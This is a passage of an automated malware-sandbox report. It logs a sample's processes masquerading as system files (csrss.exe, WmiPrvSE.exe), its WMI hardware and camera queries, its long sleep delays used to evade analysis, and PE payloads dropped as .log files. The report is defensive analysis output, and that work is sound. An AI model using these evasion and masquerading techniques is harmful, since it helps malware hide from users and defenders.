                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Memory allocated: 1240000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Memory allocated: 1AC40000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Memory allocated: 1450000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Memory allocated: 1B2A0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Memory allocated: 10D0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Memory allocated: 1AE30000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Memory allocated: 2ED0000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Memory allocated: 1B1A0000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Memory allocated: 1000000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Memory allocated: 1ACA0000 memory reserve | memory write watch
                                    Source: C:\Recovery\csrss.exe Memory allocated: 31B0000 memory reserve | memory write watch
                                    Source: C:\Recovery\csrss.exe Memory allocated: 1B1B0000 memory reserve | memory write watch
                                    Source: C:\Recovery\csrss.exe Memory allocated: 2AE0000 memory reserve | memory write watch
                                    Source: C:\Recovery\csrss.exe Memory allocated: 1AAE0000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\WmiPrvSE.exe Memory allocated: E30000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\WmiPrvSE.exe Memory allocated: 1A920000 memory reserve | memory write watch
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_04AE2FBF sldt word ptr [eax] 1_2_04AE2FBF
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 599828
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 599562
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 599016
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 598453
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 598250
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 598000
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 597875
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 597687
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 597469
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 597312
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 597094
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 596344
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 596187
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 596078
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 595946
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 595836
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 595705
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 595578
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 595468
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 595359
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 595249
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 595140
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 595028
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 300000
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 594922
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 594797
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 594678
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 594547
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 594429
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 594309
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 594184
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 593781
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 593638
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 593523
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 593406
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 593297
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 593163
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 593046
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 592902
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 592787
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 592656
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 592546
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 592437
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 592328
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 592219
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 592094
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 591984
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 591875
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 591762
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 591562
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 591225
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 591083
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\csrss.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\csrss.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                    Source: C:\Users\user\Desktop\Internal.exe Window / User API: threadDelayed 758
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Window / User API: threadDelayed 4352
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Window / User API: threadDelayed 5308
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wekqfedd.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZcxEZvOD.log
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cQVCqZDT.log
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UjoVbfCg.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bQCMLIKB.log
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WuLVbyih.log
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\Vmjnufha.log
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RypOpByW.log
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fXTLLrxO.log
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mVSSSdRf.log
                                    Source: C:\Blockcomcrt\AgentMonitor.exe TID: 4152 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 4268 Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -31359464925306218s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -600000s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -599828s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -599562s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -599016s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 5868 Thread sleep time: -3600000s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -598453s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -598250s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -598000s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -597875s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -597687s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -597469s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -597312s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -597094s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -596344s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588 Thread sleep time: -596187s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -596078s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595946s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595836s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595705s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595578s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595468s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595359s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595249s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595140s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595028s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 5868Thread sleep time: -300000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594922s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594797s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594678s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594547s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594429s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594309s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594184s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593781s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593638s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593523s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593406s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593297s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593163s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593046s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592902s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592787s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592656s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592546s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592437s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592328s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592219s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592094s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591984s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591875s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591762s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591562s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591225s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591083s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 3160Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Blockcomcrt\AgentMonitor.exe TID: 5348Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Blockcomcrt\AgentMonitor.exe TID: 5760Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\csrss.exe TID: 4924Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\csrss.exe TID: 1904Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Blockcomcrt\WmiPrvSE.exe TID: 4424Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\csrss.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_004FA69B FindFirstFileW,FindFirstFileW,1_2_004FA69B
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_04AE685B NtQueryInformationProcess,GetSystemInfo,1_2_04AE685B
                                    Source: C:\Blockcomcrt\AgentMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 599828Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 599562Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 599016Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 598453Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 598250Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 598000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597875Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597687Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597469Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597312Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597094Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 596344Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 596187Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 596078Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595946Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595836Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595705Jump to behavior
